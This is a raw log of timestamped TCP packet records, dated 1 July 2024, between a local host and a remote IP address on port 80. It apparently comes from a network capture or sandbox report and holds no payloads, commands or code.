Jul 1, 2024 13:02:07.859287977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859702110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859711885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859723091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859740019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859754086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859761000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859771013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859778881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859788895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859797001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859827042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.860569954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.860583067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.860625029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.860989094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861002922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861013889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861026049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861033916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861043930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861054897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861063957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861073017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861083984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861093044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861113071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861705065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861716032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861728907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861742020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861751080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861759901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861772060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861783028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861789942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861800909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.861814022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.861839056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.862632990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.862647057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.862657070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.862689018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.862700939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.865695000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.865763903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.865829945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.865840912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.865883112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866079092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866091013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866101980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866112947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866127014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866175890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866452932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866463900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866476059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866487026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866498947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866507053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866518021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866523981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866533995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.866543055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.866576910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.867177010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867230892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.867296934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867312908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867348909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.867361069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.867552042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867563009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867573023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867583036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.867600918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.867728949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.876903057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.876970053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.876992941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877002001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877048969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.877067089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.877217054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877228022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877264977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.877530098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877541065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877552986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.877603054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.877705097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.883647919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.883660078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.883678913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.883713007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.883737087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.883930922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.883991003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884062052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884073019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884084940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884097099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884114027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884140015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884722948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884733915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884748936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884761095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884773970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884782076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884788990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884799004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.884814024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.884840965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.885998011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886050940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886109114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886120081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886162996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886519909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886531115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886545897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886574030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886588097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886833906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886845112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886856079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886867046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886882067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886888027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886898994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.886909962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.886930943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.887620926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.887633085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.887671947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889121056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889175892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889182091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889192104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889235020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889252901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889421940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889434099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889446020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889478922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889508009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.889750957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889760971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.889820099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.948782921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.948832035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.948847055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.948859930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.948884964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949194908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949207067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949219942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949245930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949269056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949567080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949579000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949590921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949604034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949615955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949625015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949637890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.949645042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949661970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.949692011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.950402975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.950414896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.950462103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.953829050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.953890085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.953912973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.953923941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.953947067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.953967094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954104900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954116106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954128027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954140902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954145908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954164028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954195976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954483986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954520941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954528093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954541922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954554081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.954562902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954581022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.954596043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955301046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955315113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955326080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955343008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955348969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955358028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955368042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955379009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955385923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955395937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955408096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955415010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955431938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955440044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955461025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955477953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955899954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955910921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955924034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955935955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955944061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955950975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955960989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.955969095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.955986977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.956000090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:08.256902933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:08.258054018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:08.261991024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:08.263096094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:08.514193058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:08.514301062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:09.037518978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:09.050684929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:09.246896029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:09.247057915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.238349915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.244416952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.440373898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.440556049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.743176937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.748281002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943574905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943607092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943619013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943722010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.943830013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943841934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943852901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943864107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.943885088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.943905115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.944310904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.944323063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.944334030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.944361925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.944380999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.965111017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.965152025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.965162992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.965328932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.965342045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.965389967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.966670036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.966736078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.966749907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.966759920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.966799021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.966898918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.966909885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.966952085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.970283985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.970344067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.970355988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.970367908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.970400095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.970540047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.970583916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.973309040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.973371983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.973397970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.973417997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.973449945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.973546982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.973592043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.975480080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.975537062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.975572109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.975584030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.975615978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.975706100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.975753069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.977678061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.977730989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.977757931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.977770090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.977798939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.977819920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.977915049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.977960110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.986427069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.986500978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.986524105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.986536026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.986562967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.986582041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.986726046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.987011909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.988404989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.988466978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.988519907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.988559008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.988616943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.988714933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.988758087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.990791082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.990842104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.990866899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.990878105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.990916014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.991045952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.991092920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.992257118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.992311001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.992352962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.992364883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.992404938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.992522001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.992566109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.995274067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.995326996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.995352030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.995362043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.995402098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.995469093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.995482922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.995512962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.995537996 CEST	49705	80	192.168.2.5	147.45.78.162
